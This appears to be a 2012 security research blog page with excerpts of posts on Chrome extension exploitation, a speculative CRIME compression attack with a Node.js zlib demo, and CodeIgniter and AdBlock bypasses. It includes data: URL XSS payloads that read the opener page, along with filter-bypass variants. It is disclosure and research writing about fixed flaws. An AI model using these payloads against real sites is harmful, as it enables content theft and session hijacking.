It can be solved in multiple ways. Even if you've already beaten it - try doing it another way. I can promise that you'll learn something new along the way.

So, without further ado, I present to you:


Good luck!

Friday, September 28, 2012

Owning a system through a Chrome extension - cr-gpg 0.7.4 vulns

tldr; read all. fun stuff.

I've recently shown a few ways one can abuse certain Chrome extensions. For example, it is possible to fingerprint all the extensions the current user has installed. Also, they suffer from standard web vulnerabilities. XSS is so common that I've built XSS ChEF to assist the exploitation. Together with @theKos we ran workshops on exploiting Chrome extensions.

But the most interesting vulnerabilities may be hidden in the code of plugins (NPAPI .dll / .so files) that are sometimes bundled with extensions. These are binary files that run outside of Google Chrome's sandbox. Plugin functions are of course called from the extension's Javascript code. So, through XSS one could exploit e.g. a buffer overflow or a use-after-free and, theoretically, hijack the OS user account.

The threat isn't theoretical though. I was able to find a chain of vulnerabilities in the cr-gpg extension, which handles PGP encryption/decryption from within the Gmail interface. Funny thing - the exact same vulnerabilities were reported independently by Gynvael Coldwind - great finds, Gynvael! All the issues reported below were present in version 0.7.4 and are fixed in >=0.8.2.

Tuesday, September 11, 2012

If it's a CRIME, then I'm guilty

tldr: see the bottom for the script that demonstrates what CRIME might do.

A secret crime

Juliano Rizzo and Thai Duong did it again. Their new attack on SSL, called CRIME, just like their previous one, BEAST, is able to extract cookie values (to perform a session hijack) from SSL/TLS encrypted sessions. BEAST was a chosen-plaintext attack and generally required:
  • Man-in-the-middle (attacker monitors all encrypted traffic)
  • Encrypted connection to attacked domain (e.g. victim uses https://mybank.com ) with cookies
  • Adaptive Javascript code able to send POST requests to attacked domain
The Javascript code tried bruteforcing the cookie value character by character. The m-i-t-m component was observing the ciphertext, looking for differences, and once it found one, it communicated with the Javascript to proceed to the next character.

CRIME should be similar:
"By running JavaScript code in the browser of the victim and sniffing HTTPS traffic, we can decrypt session cookies," Rizzo told Threatpost. "We don't need to use any browser plugin and we use JavaScript to make the attack faster, but in theory we could do it with static HTML." (source)
but the details are not yet known; they are to be released later this month at Ekoparty.

However, there are already speculations on what the attack could rely on. In fact, Thomas Pornin at security.stackexchange.com has most likely figured it out correctly. The hypothesis is that Rizzo and Duong abuse data compression within the encrypted connection. It's likely, as e.g. Chromium disabled TLS compression recently.
Compression-based leakage

Thanks to Cross-Origin Resource Sharing it is possible (and easy) for JS to send a POST request with an arbitrary body cross-domain. One has limited control over the request headers though - e.g. the cookie header will either be attached in full or not at all (it's not possible to set cookies cross-domain). But the attacker can construct a request that looks like this:
POST / HTTP/1.1
Host: thebankserver.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1
Accept: */*
Cookie: secret=XS8b1MWZ0QEKJtM1t+QCofRpCsT2u
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

POST / HTTP/1.1
Host: thebankserver.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1
Accept: */*
Cookie: secret=?

To put it simply, in the POST body we're duplicating part of the POST headers. This should compress very nicely. We would know most of the header values (from browser fingerprinting, the navigator object etc.); only the cookie value is unknown.

But we can bruteforce the first character of the cookie by including it in the POST body (we have no control over the headers) after the secret= string. By observing the compressed ciphertext length (as the man in the middle) for all such requests, we should be able to spot the difference in one of them. That ciphertext would be shorter due to better compression (a longer string occurred twice in the request). Then we communicate with the JS to proceed to the next character, and the process continues until the whole cookie value is bruteforced.

That's the theory, at least.
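The core principle is easy to check offline with zlib alone (a toy sketch in Node.js; the cookie value and guess alphabet are illustrative):

var zlib = require('zlib');

// the known part of the request: headers, including the secret cookie
var headers = 'POST / HTTP/1.1\r\nHost: thebankserver.com\r\n' +
    'Cookie: secret=XS8b1MWZ0QEKJtM1t+QCofRpCsT2u\r\n\r\n';

// guess the first character of the cookie value in the POST body
var alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
alphabet.split('').forEach(function (guess) {
  var len = zlib.deflateSync(headers + 'Cookie: secret=' + guess).length;
  // the correct guess ('X' here) yields the shortest output,
  // because the duplicated string compresses better
  console.log(guess, len);
});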
PoC or didn't happen!
There was no time to recreate the whole man-in-the-middle, adaptive JS, encrypted connection setup, so xorninja wrote a script to check the length of zlib-deflated HTTP request strings and deduce the cookie values from there. It didn't work, so I modified the code, adding an adaptive algorithm (the encrypted length does not always change; sometimes you also have to mutate the POST body to be certain of a character value, etc.).

And it works.
The proof of concept can bruteforce the cookie value based on the zlib-deflated string length alone. Cookies can be of arbitrary length.
So, what next?
This PoC would have to be included in the whole SSL/mitm/Javascript BEAST-like context so we can check if it actually works in browsers and leaks real-life cookies. Feel free to experiment. I'm waiting for the actual CRIME disclosure.

Friday, August 24, 2012

Hack In Paris talk and future events

Videos from the recent Hack In Paris 2012 conference have just been published; among them is a recording of my talk, "HTML5 - something wicked this way comes":



With accompanying slides:



Plans for next few months:
  • BruCON (24-25.09, Ghent, Belgium) - Kyle 'Kos' Osborn & Krzysztof Kotowicz - Advanced Chrome Extension Exploitation
  • Security BSides (12-14.10, Warsaw, Poland) - I’m in your browser, pwning your stuff: Atakowanie poprzez rozszerzenia Google Chrome (Attacking through Google Chrome extensions)
  • Secure 2012 (22-24.10, Warsaw, Poland) - Atakowanie przy użyciu HTML5 w praktyce (Attacking with HTML5 in practice)
And a few neat exploits in the queue, waiting to be released ;)

Friday, August 17, 2012

How Facebook lacked X-Frame-Options and what I did with it

In September 2011 I discovered a vulnerability that allowed an attacker to partially take control of a victim's Facebook account. It allowed, among other things, sending status updates on behalf of the user and sending friend requests to an attacker-controlled Facebook account. The vulnerability was responsibly disclosed as part of the Facebook Security Bug Bounty program and is now fixed.

Thursday, July 26, 2012

XSS ChEF - Chrome extension exploitation framework

Recently I've been busy with my new little project. What started out as a proof of concept suddenly became good enough to demonstrate with Kyle Osborn at BlackHat, so I decided I might just present it here too ;)

Thursday, July 19, 2012

CodeIgniter <= 2.1.1 xss_clean() Cross Site Scripting filter bypass

This is a security advisory for the popular PHP framework CodeIgniter. I've found several bypasses of the XSS sanitization function xss_clean() in the framework. These were responsibly disclosed to the vendor and are now fixed in version 2.1.2 (CVE-2012-1915).

Friday, April 6, 2012

Fun with data: URLs

Data URLs, especially in their base64 encoding, can often be used to bypass anti-XSS filters. This gets even more important in Firefox and Opera, where newly opened documents retain access to the opening page. So an attacker can trigger XSS with only this semi-innocent link:
<a target=_blank href="data:text/html,<script>alert(opener.document.body.innerHTML)</script>">clickme in Opera/FF</a>
or even use the base64 encoding of the URL:
data:text/html;base64,PHNjcmlwdD5hbGVydChvcGVuZXIuZG9jdW1lbnQuYm9keS5pbm5lckhUTUwrMTApPC9zY3JpcHQ+
Chrome will block access to the originating page, so the attacker has limited options:

But what if a particular XSS filter knows about data: URIs and tries to reject them? We bypass, of course :) I've been fuzzing the data: URI syntax recently and I just thought you might find the examples below interesting:
data:text/html;base64wakemeupbeforeyougogo,[content] // FF, Safari
data:text/html:;base64,[content]
data:text/html:[plenty-of-whitespace];base64,[content]
data:text/html;base64,,[content] // Opera


Here are the full fuzz results for the vector:
data:text/html;<before>base64<after>,[base64content]

Browser      | Before (ASCII)  | After (ASCII)
Firefox 11   | 9,10,13,59      | anything
Safari 5.1   | 9,10,13,59      | anything
Chrome 18    | 9,10,13,32,59   | 9,10,13,32,59
Opera 11.6   | 9,10,13,32,59   | 9,10,13,32,44,59

Not a ground-breaking result, but it may come in handy one day for you, like it did for me.

Tuesday, March 27, 2012

Chrome addons hacking: Bye Bye AdBlock filters!

Continuing the Chrome extension hacking (see part 1 and 2), this time I'd like to draw your attention to the oh-so-popular AdBlock extension. It has over a million users, is being actively maintained and is a piece of great software (heck, even I use it!). However - due to how Chrome extensions work in general, it is still relatively easy to bypass it and display some ads. Let me describe two distinct vulnerabilities I've discovered. They are both exploitable in the newest version, 2.5.22.

tl;dr: Chrome AdBlock 2.5.22 bypasses, demo here and here, but I'd advise you to read on.